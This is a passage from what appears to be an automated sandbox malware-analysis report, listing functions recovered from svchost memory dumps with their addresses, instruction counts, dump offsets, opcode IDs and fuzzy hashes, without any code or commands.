                                                                                                                  • Instruction Fuzzy Hash: F7817F75A00245DFCB09CFA9C490AAEBBF1FF88310F1981A9D859EB355D734EA51CB90
                                                                                                                  Function 03CF903E Relevance: .2, Instructions: 186COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                                                                                  • Instruction ID: ae6a1fc41fc7eae335b0b9777f8b7b124a036dff786db2aa7c4b6cfff32c3a2b
                                                                                                                  • Opcode Fuzzy Hash: 830682911b6ad9e61189aa78693a1be4c7dbcc517c1afecbe836c94766417b00
                                                                                                                  • Instruction Fuzzy Hash: C861FFB5600715AFDB95DF64C884BABFBA8FF88700F018619FA59CB240DB30E914DB91
                                                                                                                  Function 03CFFCF2 Relevance: .2, Instructions: 181COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: da6e9203a225adc4fcba2f78aa47793e38e7e302502642113fdc7aa7095cc109
                                                                                                                  • Instruction ID: c76c53ad8e286b57aa790c5da5f3ac6fdd6dda784c52bd91e6a73f689f304aa7
                                                                                                                  • Opcode Fuzzy Hash: da6e9203a225adc4fcba2f78aa47793e38e7e302502642113fdc7aa7095cc109
                                                                                                                  • Instruction Fuzzy Hash: A561BF31A0020A9FCB94DF68C881ABEF7F5FF48314F25856DE615EB284D730AA55CB50
                                                                                                                  Function 03C37703 Relevance: .2, Instructions: 179COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                                                                                  • Instruction ID: 60d7ab17819995ed07f82fe838ee6b143142f5eeddc89802095d2581199305fe
                                                                                                                  • Opcode Fuzzy Hash: b35adfe82addcf18000aa9772f80622ff7ad1242d9719769081e98aae7292b58
                                                                                                                  • Instruction Fuzzy Hash: 9A6162B5A00606EFDB18DF69C480AADFBB5FF49200F19856AD419EB340DB30AA41CBD0
                                                                                                                  Function 03CF92A6 Relevance: .2, Instructions: 174COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                                                                                  • Instruction ID: aea789e0240190ad75caed53831568f959b380181d41a6e6abe2f8d5d895ed60
                                                                                                                  • Opcode Fuzzy Hash: 744c6e0de8740a2d9e3eb564fd7395f44801835d13e2168f1365ffbdb8626d6c
                                                                                                                  • Instruction Fuzzy Hash: 816114352047828FDB95CF69C494B6AF7E0BF90704F19046DEA85CF291DB31E90ACB91
                                                                                                                  Function 03CFCE93 Relevance: .2, Instructions: 172COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                  • Instruction ID: 9b13aa5ddc45553320d68fb4255997a493950b2324b09ded71dbb9e5a7035fe3
                                                                                                                  • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                                                                                                  • Instruction Fuzzy Hash: DE51353270430A4FC794DE298C5076BFBD6AFC1250F1EC46DEA96CF249DA30DA0A8791
                                                                                                                  Function 00410003 Relevance: .2, Instructions: 165COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                  • Instruction ID: dd825616624a26e2f623fda80b1a6d9ad67bcca8f3c0d09de1a29d2cf44b93b7
                                                                                                                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                  • Instruction Fuzzy Hash: 455182B3E54A214BD3188E09CC40631B792EFC8312B5F81BADD199B357CA74E9529A90
                                                                                                                  Function 03C2B2D3 Relevance: .2, Instructions: 161COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                                                                                  • Instruction ID: 7e6a9eafc19761bb3b39a8b7dccda1a837261996689a355fae96fe95a8056088
                                                                                                                  • Opcode Fuzzy Hash: b4de1c27dcdf8468a95c3f59b6b5f95f4dcba853a4b9d05132afc3ea6dd7244f
                                                                                                                  • Instruction Fuzzy Hash: 94415536600710AFCB26EF25D980F2ABBA9EF44720F1A8469E559CF350DB70DD018B90
                                                                                                                  Function 03CF7D73 Relevance: .2, Instructions: 160COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cb528b9ab6d003e24777d9bcbd6bfbd7c89a9b224f1e302b561e4c8f518deceb
                                                                                                                  • Instruction ID: 20c89d9805005ed90a9eea5d62dfc52740ee0a775c275ab7d12088576f198e33
                                                                                                                  • Opcode Fuzzy Hash: cb528b9ab6d003e24777d9bcbd6bfbd7c89a9b224f1e302b561e4c8f518deceb
                                                                                                                  • Instruction Fuzzy Hash: DF51B136A1014A8FCB08CF68C880AAEB7F5EF98354B19827AD915DB355E734DA15CB90
                                                                                                                  Function 03C43740 Relevance: .2, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                                                                                  • Instruction ID: 91b14891027b8bdc55907ea65d7ac7b2f957f8d75f091cc2d6ddd41eca8a0a40
                                                                                                                  • Opcode Fuzzy Hash: d03f02f6d44d0a4cab59860ba502d4488653ebed4e28bb30eb60ae30b06bee2d
                                                                                                                  • Instruction Fuzzy Hash: AE51E27AA00695AFC711CF68C880669F7B0FF94710F0942A6E895DF740E734EAA1CBD0
                                                                                                                  Function 03C37152 Relevance: .2, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                                                                                  • Instruction ID: de9135cb727a53ffda61da7843a96bf017a1eeb921f04ebe4752e8ca93ed58c6
                                                                                                                  • Opcode Fuzzy Hash: 0fe2982a10ab6a37fdab890f308137976e601d1c45722bb9da04f769e7e4b373
                                                                                                                  • Instruction Fuzzy Hash: CA513476A0060AEFEF15DF65C948BBDB7B4FF05310F19406AE416EB290DB74AA11DB80
                                                                                                                  Function 03CB3A6C Relevance: .2, Instructions: 156COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68750b895841e7d903dcdd53e8ff43bc580fa84f21949d4c4ac7c1dcafa854d0
                                                                                                                  • Instruction ID: 522bbe2811db6808b0e3632afd7673d442fe50d1b326c2c80fa16f837e2e37ef
                                                                                                                  • Opcode Fuzzy Hash: 68750b895841e7d903dcdd53e8ff43bc580fa84f21949d4c4ac7c1dcafa854d0
                                                                                                                  • Instruction Fuzzy Hash: 74518C36E4016D4BEF24CA58D461BEFB3F2EB94310F48081AE855FF3C4CAB66A56D650
                                                                                                                  Function 03CFD26B Relevance: .2, Instructions: 153COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                  • Instruction ID: ff66a1d087131cae517c15d4a15c8c5cc19a1b3dd20e3c180db31bd269979e3b
                                                                                                                  • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                                                                                  • Instruction Fuzzy Hash: 7C516C766087429FC351CF28C888B5ABBE5FBC8344F04892DFA95CB244D734E945CB52
                                                                                                                  Function 03CF7571 Relevance: .2, Instructions: 153COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b996057016e8a15077fb9861825fc40c6d4ae8d5ad6bc0be2a148a381c271e11
                                                                                                                  • Instruction ID: 1cdc9dea21202d3303a9fda48d17f10be27f9f3d1a75681dfdf86cf2f07f4ce5
                                                                                                                  • Opcode Fuzzy Hash: b996057016e8a15077fb9861825fc40c6d4ae8d5ad6bc0be2a148a381c271e11
                                                                                                                  • Instruction Fuzzy Hash: A951D732E00115AFCB55EF69D844A7EFBB9FF48390F494169DA11DB254DB70AE11CB80
                                                                                                                  Function 03C351ED Relevance: .1, Instructions: 149COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                                                                                  • Instruction ID: 1c5fe0bb91c6be05f89034bbdc0ee3a33b4c90f2e8fc556f2164760e96ab21e7
                                                                                                                  • Opcode Fuzzy Hash: 568a3b965b6139aa3aedd4307f4bbfccac38b876fdcccbe8682e79eb69df304c
                                                                                                                  • Instruction Fuzzy Hash: 03519C75A05315DFEF21DBA9C844BEDB3B8BF0B714F190059E811EB241D7B5EA408BA2
                                                                                                                  Function 03C6F71F Relevance: .1, Instructions: 143COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                                                                                  • Instruction ID: 2f7a5007933fcb1b18d1eac62cf8b3c5b1b77c653eedaaa5491ecc3b33ad01d0
                                                                                                                  • Opcode Fuzzy Hash: 72988ed75f5bc2699b9d1a56f4d462e9658c2be3bd2cd883b4164f1760be0aae
                                                                                                                  • Instruction Fuzzy Hash: 74416A76D04229ABDF11DBA8D888AAFF7BCAF45654F060166E901FB200DA34DE4197E4
                                                                                                                  Function 03D035D7 Relevance: .1, Instructions: 139COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                  • Instruction ID: 5c6994efca078615ac6e58a7021e0191bb5602b0c7fc58c72c64b81b7c5e93ce
                                                                                                                  • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                                                                                  • Instruction Fuzzy Hash: 38514875600606EFCB15CF54C580B56BBB9FF45B04F5980AAE908DF2A2E371E985CB90
                                                                                                                  Function 03C601F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                                                                                  • Instruction ID: b4bfcafb7861ca1c765989d7af620dcc4ef8f6be05d8fe1838d777a12c79ed40
                                                                                                                  • Opcode Fuzzy Hash: a4d1b78fb49cd0d4b708b5dc39b6323922fb4dfcad0adff3cc68c5ae174e691c
                                                                                                                  • Instruction Fuzzy Hash: 4C41B076D05225DBCB14DF98C480AEDF7B4BF88714F19816AE816FB240D735AD42CBA4
                                                                                                                  Function 03C72750 Relevance: .1, Instructions: 137COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                  • Instruction ID: 13d85d596556611af388a4b347e4fadf4862ad233baf7f9e2192c11fe9cbff8c
                                                                                                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                  • Instruction Fuzzy Hash: 09512979A0061A9FCB14CF59C580AAEF7B6FF84714F2981A9D815EB350D730AA41CB90
                                                                                                                  Function 03C36154 Relevance: .1, Instructions: 133COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                                                                                  • Instruction ID: 94efeb148bf6818c9574c6bd282a08c3a29ba0d9ed82bba251c7d01670cc3372
                                                                                                                  • Opcode Fuzzy Hash: 78dc211b4afcbb2aca5f84d145dbdfa6a566710a52b204db35211a52925e8983
                                                                                                                  • Instruction Fuzzy Hash: 29511770904256EBDB25DB24CC44BE8BBB5EF12314F0A82E5D465DF2C0D779AA91DF80
                                                                                                                  Function 03C2B136 Relevance: .1, Instructions: 131COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                                                                                  • Instruction ID: 4b800d163ebb7c97696eff6b9113e64d04a05ba549d175602b036b54398da7bd
                                                                                                                  • Opcode Fuzzy Hash: edea00ccfce29e670dd91a98aa9d97d8b0cb35df61605ff060e91f839b4bdf3d
                                                                                                                  • Instruction Fuzzy Hash: 1041BBB5640311EFDB21EF65C880B2AFBA8EF50794F098469E511DF250D7B4EE40DBA0
                                                                                                                  Function 03CFF0E0 Relevance: .1, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a7dc4da94b4835bb7e6c61db8abdf58d9d453c03ae8be43680aa41d58fe8c298
                                                                                                                  • Instruction ID: b32710921f295c8bf945e48f87f21730e46c30b450a1b65b84ec4f735fca7879
                                                                                                                  • Opcode Fuzzy Hash: a7dc4da94b4835bb7e6c61db8abdf58d9d453c03ae8be43680aa41d58fe8c298
                                                                                                                  • Instruction Fuzzy Hash: 6A41D0712083418FCB44CF65D8A597ABBE1EB84715F088A5EF995CB382C730D909CB61
                                                                                                                  Function 03CF866E Relevance: .1, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                  • Instruction ID: 87afa016f92e41f19f020d331f3f1d7ae4d5b37b62db79f05259b4bee6576b2f
                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                  • Instruction Fuzzy Hash: 24419575B00319AFDB55DF99CC85AAFB7BAAF84600F194069E604DB341D674DE01C760
                                                                                                                  Function 03CDD5B0 Relevance: .1, Instructions: 128COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8f3d2649951639c8dd54ff417db6bcab3a227c25dd622e811099f2664559da39
                                                                                                                  • Instruction ID: d2ad6dc4b2c4cc377741fd0d3d96a575a26a4b07d295a566e14eeaee4f04a661
                                                                                                                  • Opcode Fuzzy Hash: 8f3d2649951639c8dd54ff417db6bcab3a227c25dd622e811099f2664559da39
                                                                                                                  • Instruction Fuzzy Hash: F8410530E082949FCB14DF29C4996BAFBF1EF49300F098889E6C6CF245C734A556DBA0
                                                                                                                  Function 03C5D6E0 Relevance: .1, Instructions: 126COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                                                                                  • Instruction ID: f3226e2b3a216465035f7106eb3365ced294b44c9e0a5d9e35f6bd8e35b8f375
                                                                                                                  • Opcode Fuzzy Hash: c5ec249b7a03e8b256e2a40fa546b563435fa0aa9f9194d12887772bb63aedd6
                                                                                                                  • Instruction Fuzzy Hash: 2041E3765047009FD725EF25C894F2AB7A9EB65760F06052EFC15CF391CB30A841DB95
                                                                                                                  Function 03C2A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                  • Instruction ID: 01f51b06ce5402694c02a7119b4770a2731e69c35503e8d571ba23dd3f8231d2
                                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                  • Instruction Fuzzy Hash: A8412E3DA00321EFDB20EF9588507BAFB72EB50759F1A806AE946DF240DA359F40D790
                                                                                                                  Function 03C60710 Relevance: .1, Instructions: 121COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                  • Instruction ID: 65ed7ba5375eed8e0018d3f6f777fe57bf6e77fa3621d5002ec76568157f58be
                                                                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                  • Instruction Fuzzy Hash: 8541F475A04715EFDB24CF99C9C0AAAB7F8FF18700B10496DE556EB690E730AA44CF90
                                                                                                                  Function 03C3262C Relevance: .1, Instructions: 119COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c3783dec1caa78d47add97902abd8bf63b6cabd3c395946101bd2b9e3ca45b3
                                                                                                                  • Instruction ID: 96528d9d843d8e94280d96a026cc495179c783439d5b13e90143cb11ed9380e2
                                                                                                                  • Opcode Fuzzy Hash: 4c3783dec1caa78d47add97902abd8bf63b6cabd3c395946101bd2b9e3ca45b3
                                                                                                                  • Instruction Fuzzy Hash: D541FD75901714CFCB21EF28D940B29B7B6FF4A314F158AA9C816DF2A0EB30EA40DB51
                                                                                                                  Function 03CFFFB1 Relevance: .1, Instructions: 117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 299b0233676177a18824b1875e9fa1db6e56c3b916270381285fc5d9a7cf5b83
                                                                                                                  • Instruction ID: c6a53297608dc5cffda7d1d7965b41b7e01aebdfda2cafbe07e56e01cba000ab
                                                                                                                  • Opcode Fuzzy Hash: 299b0233676177a18824b1875e9fa1db6e56c3b916270381285fc5d9a7cf5b83
                                                                                                                  • Instruction Fuzzy Hash: F9413A319042956BCB40CB6684A07BABFF2EF85605F0DC1AAED81DB382D639C916C770
                                                                                                                  Function 03CFFA49 Relevance: .1, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ca6ba3532587de5736e35cf5566941017a4cb3dabe8a5dcab26c6d7b6e9cc336
